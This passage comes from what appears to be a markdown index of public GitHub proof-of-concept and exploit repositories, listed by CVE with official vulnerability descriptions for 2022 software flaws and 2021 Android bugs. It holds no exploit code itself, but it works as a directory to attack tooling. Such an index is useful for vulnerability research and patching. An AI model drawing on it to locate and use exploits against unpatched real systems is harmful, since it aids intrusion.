[404tk/CVE-2022-46463](https://github.com/404tk/CVE-2022-46463) + +### CVE-2022-46484 (2023-08-02) + +Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys. + + +- [WodenSec/CVE-2022-46484](https://github.com/WodenSec/CVE-2022-46484) + +### CVE-2022-46485 (2023-08-02) + +Data Illusion Survey Software Solutions ngSurvey version 2.4.28 and below is vulnerable to Denial of Service if a survey contains a "Text Field", "Comment Field" or "Contact Details". + + +- [WodenSec/CVE-2022-46485](https://github.com/WodenSec/CVE-2022-46485) + +### CVE-2022-46505 (2023-01-18) + +An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data. + + +- [SmallTown123/details-for-CVE-2022-46505](https://github.com/SmallTown123/details-for-CVE-2022-46505) + +### CVE-2022-46604 (2023-02-02) + +An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution. + + +- [galoget/ResponsiveFileManager-CVE-2022-46604](https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604) + +### CVE-2022-46622 (2023-01-12) + +A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter. + + +- [sudoninja-noob/CVE-2022-46622](https://github.com/sudoninja-noob/CVE-2022-46622) + +### CVE-2022-46623 (2023-01-12) + +Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter. + + +- [sudoninja-noob/CVE-2022-46623](https://github.com/sudoninja-noob/CVE-2022-46623) + +### CVE-2022-46638 +- [naonymous101/CVE-2022-46638](https://github.com/naonymous101/CVE-2022-46638) + +### CVE-2022-46689 (2022-12-15) + +A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges. + + +- [zhuowei/MacDirtyCowDemo](https://github.com/zhuowei/MacDirtyCowDemo) +- [ahkecha/McDirty](https://github.com/ahkecha/McDirty) +- [straight-tamago/NoCameraSound](https://github.com/straight-tamago/NoCameraSound) +- [ginsudev/WDBFontOverwrite](https://github.com/ginsudev/WDBFontOverwrite) +- [mineek/FileManager](https://github.com/mineek/FileManager) +- [straight-tamago/NoHomeBar](https://github.com/straight-tamago/NoHomeBar) +- [straight-tamago/DockTransparent](https://github.com/straight-tamago/DockTransparent) +- [straight-tamago/FileSwitcherX](https://github.com/straight-tamago/FileSwitcherX) +- [BomberFish/Mandela-Legacy](https://github.com/BomberFish/Mandela-Legacy) +- [BomberFish/JailedCement](https://github.com/BomberFish/JailedCement) +- [BomberFish/Mandela-Classic](https://github.com/BomberFish/Mandela-Classic) +- [enty8080/MacDirtyCow](https://github.com/enty8080/MacDirtyCow) +- [tdquang266/MDC](https://github.com/tdquang266/MDC) +- [69camau/sw1tch](https://github.com/69camau/sw1tch) + +### CVE-2022-46718 (2023-06-23) + +A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information + + +- [biscuitehh/cve-2022-46718-leaky-location](https://github.com/biscuitehh/cve-2022-46718-leaky-location) + +### CVE-2022-46836 (2023-02-20) + +PHP code injection in watolib auth.php and hosttags.php in Tribe29's Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29 allows an attacker to inject and execute PHP code which will be executed upon request of the vulnerable component. + + +- [JacobEbben/CVE-2022-46836_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46836_remote_code_execution) + +### CVE-2022-47102 (2023-01-12) + +A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. + + +- [sudoninja-noob/CVE-2022-47102](https://github.com/sudoninja-noob/CVE-2022-47102) + +### CVE-2022-47130 (2023-02-03) + +A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows a discount coupon to be arbitrarily created if an attacker with administrative privileges interacts on the CSRF page. + + +- [OpenXP-Research/CVE-2022-47130](https://github.com/OpenXP-Research/CVE-2022-47130) + +### CVE-2022-47131 (2023-02-03) + +A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows an attacker to arbitrarily create a page. + + +- [OpenXP-Research/CVE-2022-47131](https://github.com/OpenXP-Research/CVE-2022-47131) + +### CVE-2022-47132 (2023-02-03) + +A Cross-Site Request Forgery (CSRF) in Academy LMS before v5.10 allows attackers to arbitrarily add Administrator users. + + +- [OpenXP-Research/CVE-2022-47132](https://github.com/OpenXP-Research/CVE-2022-47132) + +### CVE-2022-47197 (2023-01-19) + +An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post. + + +- [miguelc49/CVE-2022-47197-2](https://github.com/miguelc49/CVE-2022-47197-2) +- [miguelc49/CVE-2022-47197-1](https://github.com/miguelc49/CVE-2022-47197-1) + +### CVE-2022-47373 (2023-02-15) + +Reflected Cross Site Scripting in Search Functionality of Module Library in Pandora FMS Console v766 and lower. This vulnerability arises on the forget password functionality in which parameter username does not proper input validation/sanitization thus results in executing malicious JavaScript payload. + + +- [Argonx21/CVE-2022-47373](https://github.com/Argonx21/CVE-2022-47373) + +### CVE-2022-47529 (2023-03-28) + +Insecure Win32 memory objects in Endpoint Windows Agents in RSA NetWitness Platform before 12.2 allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. + + +- [hyp3rlinx/CVE-2022-47529](https://github.com/hyp3rlinx/CVE-2022-47529) + +### CVE-2022-47615 (2023-01-24) + +Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + + +- [RandomRobbieBF/CVE-2022-47615](https://github.com/RandomRobbieBF/CVE-2022-47615) + +### CVE-2022-47872 (2023-02-01) + +A Server-Side Request Forgery (SSRF) in maccms10 v2021.1000.2000 allows attackers to force the application to make arbitrary requests via a crafted payload injected into the Name parameter under the Interface address module. + + +- [Cedric1314/CVE-2022-47872](https://github.com/Cedric1314/CVE-2022-47872) + +### CVE-2022-47909 (2023-02-20) + +Livestatus Query Language (LQL) injection in the AuthUser HTTP query header of Tribe29's Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL) allows an attacker to perform direct queries to the application's core from localhost. + + +- [JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion](https://github.com/JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion) + +### CVE-2022-47952 (2023-01-01) + +lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NOTE: this is different from CVE-2018-6556 because the CVE-2018-6556 fix design was based on the premise that "we will report back to the user that the open() failed but the user has no way of knowing why it failed"; however, in many realistic cases, there are no plausible reasons for failing except that the file does not exist. + + +- [MaherAzzouzi/CVE-2022-47952](https://github.com/MaherAzzouzi/CVE-2022-47952) + +### CVE-2022-47966 (2023-01-18) + +Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41. ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active). + + +- [horizon3ai/CVE-2022-47966](https://github.com/horizon3ai/CVE-2022-47966) +- [shameem-testing/PoC-for-ME-SAML-Vulnerability](https://github.com/shameem-testing/PoC-for-ME-SAML-Vulnerability) +- [Inplex-sys/CVE-2022-47966](https://github.com/Inplex-sys/CVE-2022-47966) +- [ACE-Responder/CVE-2022-47966_checker](https://github.com/ACE-Responder/CVE-2022-47966_checker) +- [vonahisec/CVE-2022-47966-Scan](https://github.com/vonahisec/CVE-2022-47966-Scan) + +### CVE-2022-47986 (2023-02-17) + +\nIBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.\n\n + + +- [ohnonoyesyes/CVE-2022-47986](https://github.com/ohnonoyesyes/CVE-2022-47986) +- [dhina016/CVE-2022-47986](https://github.com/dhina016/CVE-2022-47986) +- [mauricelambert/CVE-2022-47986](https://github.com/mauricelambert/CVE-2022-47986) + +### CVE-2022-48150 (2023-04-21) + +Shopware v5.5.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the recovery/install/ URI. + + +- [sahilop123/-CVE-2022-48150](https://github.com/sahilop123/-CVE-2022-48150) + +### CVE-2022-48194 (2022-12-30) + +TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate. + + +- [otsmr/internet-of-vulnerable-things](https://github.com/otsmr/internet-of-vulnerable-things) + +### CVE-2022-48197 (2023-01-02) + +Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + +- [ryan412/CVE-2022-48197](https://github.com/ryan412/CVE-2022-48197) + +### CVE-2022-48311 (2023-02-06) + +**UNSUPPORTED WHEN ASSIGNED** Cross Site Scripting (XSS) in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B allows authenticated attacker to inject their own script into the page via HTTP configuration page. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + +- [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311) + +### CVE-2022-48429 (2023-03-27) + +In JetBrains Hub before 2022.3.15573, 2022.2.15572, 2022.1.15583 reflected XSS in dashboards was possible\n + + +- [echo-devim/CVE-2022-48429_poc](https://github.com/echo-devim/CVE-2022-48429_poc) + +### CVE-2022-48474 (2023-09-12) + +Control de Ciber, in its 1.650 version, is affected by a Denial of Service condition through the version function. Sending a malicious request could cause the server to check if an unrecognized component is up to date, causing a memory failure error that shuts down the process. + + +- [sapellaniz/CVE-2022-48474_CVE-2022-48475](https://github.com/sapellaniz/CVE-2022-48474_CVE-2022-48475) + +### CVE-2022-48565 (2023-08-22) + +An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities. + + +- [Einstein2150/CVE-2022-48565-POC](https://github.com/Einstein2150/CVE-2022-48565-POC) + ## 2021 +### CVE-2021-0302 (2021-02-10) + +In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-155287782 + + +- [ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302](https://github.com/ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302) + +### CVE-2021-0306 (2021-01-11) + +In addAllPermissions of PermissionManagerService.java, there is a possible permissions bypass when upgrading major Android versions which allows an app to gain the android.permission.ACTIVITY_RECOGNITION permission without user confirmation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-154505240. + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317) + +### CVE-2021-0308 (2021-01-11) + +In ReadLogicalParts of basicmbr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158063095. + + +- [Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308](https://github.com/Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308) + +### CVE-2021-0313 (2021-01-11) + +In isWordBreakAfter of LayoutUtils.cpp, there is a possible way to slow or crash a TextView due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-170968514. + + +- [Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313](https://github.com/Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313) + +### CVE-2021-0314 (2021-02-10) + +In onCreate of UninstallerActivity, there is a possible way to uninstall an all without informed user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-171221302 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0314](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0314) + +### CVE-2021-0315 (2021-01-11) + +In onCreate of GrantCredentialsPermissionActivity.java, there is a possible way to convince the user to grant an app access to an account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-169763814. + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0315](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0315) +- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315) +- [nanopathi/frameworks_base1_CVE-2021-0315](https://github.com/nanopathi/frameworks_base1_CVE-2021-0315) + +### CVE-2021-0316 (2021-01-11) + +In avrc_pars_vendor_cmd of avrc_pars_tg.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-168802990. + + +- [Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316](https://github.com/Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316) + +### CVE-2021-0318 (2021-01-11) + +In appendEventsToCacheLocked of SensorEventConnection.cpp, there is a possible out of bounds write due to a use-after-free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-8.1, Android-10, Android-11; Android ID: A-168211968. + + +- [nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318](https://github.com/nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318) + +### CVE-2021-0319 (2021-01-11) + +In checkCallerIsSystemOr of CompanionDeviceManagerService.java, there is a possible way to get a nearby Bluetooth device's MAC address without appropriate permissions due to a permissions bypass. This could lead to local escalation of privilege that grants access to nearby MAC addresses, with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-167244818. + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319) + +### CVE-2021-0325 (2021-02-10) + +In ih264d_parse_pslice of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-174238784 + + +- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325) + +### CVE-2021-0326 (2021-02-10) + +In p2p_copy_client_info of p2p.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if the target device is performing a Wi-Fi Direct search, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172937525 + + +- [aemmitt-ns/skeleton](https://github.com/aemmitt-ns/skeleton) +- [nanopathi/wpa_supplicant_8_CVE-2021-0326.](https://github.com/nanopathi/wpa_supplicant_8_CVE-2021-0326.) +- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326) +- [nanopathi/Packages_wpa_supplicant8_CVE-2021-0326](https://github.com/nanopathi/Packages_wpa_supplicant8_CVE-2021-0326) +- [ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326](https://github.com/ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326) + +### CVE-2021-0327 (2021-02-10) + +In getContentProviderImpl of ActivityManagerService.java, there is a possible permission bypass due to non-restored binder identities. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-172935267 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0327](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0327) + +### CVE-2021-0328 (2021-02-10) + +In onBatchScanReports and deliverBatchScan of GattService.java, there is a possible way to retrieve Bluetooth scan results without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172670415 + + +- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328) + +### CVE-2021-0329 (2021-02-10) + +In several native functions called by AdvertiseManager.java, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth server with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-171400004 + + +- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329) + +### CVE-2021-0330 (2021-02-10) + +In add_user_ce and remove_user_ce of storaged.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in storaged with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-170732441 + + +- [Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330](https://github.com/Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330) + +### CVE-2021-0331 (2021-02-10) + +In onCreate of NotificationAccessConfirmationActivity.java, there is a possible overlay attack due to an insecure default value. This could lead to local escalation of privilege and notification access with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-170731783 + + +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331) + +### CVE-2021-0332 (2021-02-10) + +In bootFinished of SurfaceFlinger.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-169256435 + + +- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332) + +### CVE-2021-0333 (2021-02-10) + +In onCreate of BluetoothPermissionActivity.java, there is a possible permissions bypass due to a tapjacking overlay that obscures the phonebook permissions dialog when a Bluetooth device is connecting. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-168504491 + + +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333) + +### CVE-2021-0334 (2021-02-10) + +In onTargetSelected of ResolverActivity.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-163358811 + + +- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334) + +### CVE-2021-0336 (2021-02-10) + +In onReceive of BluetoothPermissionRequest.java, there is a possible permissions bypass due to a mutable PendingIntent. This could lead to local escalation of privilege that bypasses a permission check, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-158219161 + + +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336) + +### CVE-2021-0337 (2021-02-10) + +In moveInMediaStore of FileSystemProvider.java, there is a possible file exposure due to stale metadata. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-157474195 + + +- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337) + +### CVE-2021-0339 (2021-02-10) + +In loadAnimation of WindowContainer.java, there is a possible way to keep displaying a malicious app while a target app is brought to the foreground. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-145728687 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0339](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0339) + +### CVE-2021-0340 (2021-02-10) + +In parseNextBox of IsoInterface.java, there is a possible leak of unredacted location information due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-134155286 + + +- [Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340) +- [nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340) + +### CVE-2021-0390 (2021-03-10) + +In various methods of WifiNetworkSuggestionsManager.java, there is a possible modification of suggested networks due to a missing permission check. This could lead to local escalation of privilege by a background user on the same device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174749461 + + +- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0390](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0390) + +### CVE-2021-0391 (2021-03-10) + +In onCreate() of ChooseTypeAndAccountActivity.java, there is a possible way to learn the existence of an account, without permissions, due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172841550 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0391) + +### CVE-2021-0392 (2021-03-10) + +In main of main.cpp, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-175124730 + + +- [uthrasri/System_Connectivity_Wificond_CVE-2021-0392](https://github.com/uthrasri/System_Connectivity_Wificond_CVE-2021-0392) + +### CVE-2021-0393 (2021-03-10) + +In Scanner::LiteralBuffer::NewCapacity of scanner.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if an attacker can supply a malicious PAC file, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-168041375 + + +- [Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393](https://github.com/Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393) + +### CVE-2021-0394 (2021-03-10) + +In android_os_Parcel_readString8 of android_os_Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-172655291 + + +- [nanopathi/packages_apps_Settings_CVE-2021-0394](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0394) +- [Trinadh465/platform_art_CVE-2021-0394](https://github.com/Trinadh465/platform_art_CVE-2021-0394) + +### CVE-2021-0396 (2021-03-10) + +In Builtins::Generate_ArgumentsAdaptorTrampoline of builtins-arm.cc and related files, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-160610106 + + +- [Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396](https://github.com/Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396) + +### CVE-2021-0397 (2021-03-10) + +In sdp_copy_raw_data of sdp_discovery.cc, there is a possible system compromise due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174052148 + + +- [Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397](https://github.com/Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397) + +### CVE-2021-0399 (2021-03-10) + +In qtaguid_untag of xt_qtaguid.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176919394References: Upstream kernel + + +- [nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-](https://github.com/nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-) + +### CVE-2021-0431 (2021-04-13) + +In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a paired device with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174149901 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431) +- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0431) + +### CVE-2021-0433 (2021-04-13) + +In onCreate of DeviceChooserActivity.java, there is a possible way to bypass user consent when pairing a Bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege and pairing malicious devices with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-171221090 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433) + +### CVE-2021-0435 (2021-04-13) + +In avrc_proc_vendor_command of avrc_api.cc, there is a possible leak of heap data due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174150451 + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0435) +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435) + +### CVE-2021-0437 (2021-04-13) + +In setPlayPolicy of DrmPlugin.cpp, there is a possible double free. This could lead to local escalation of privilege in a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176168330 + + +- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437) + +### CVE-2021-0466 (2021-06-11) + +In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information 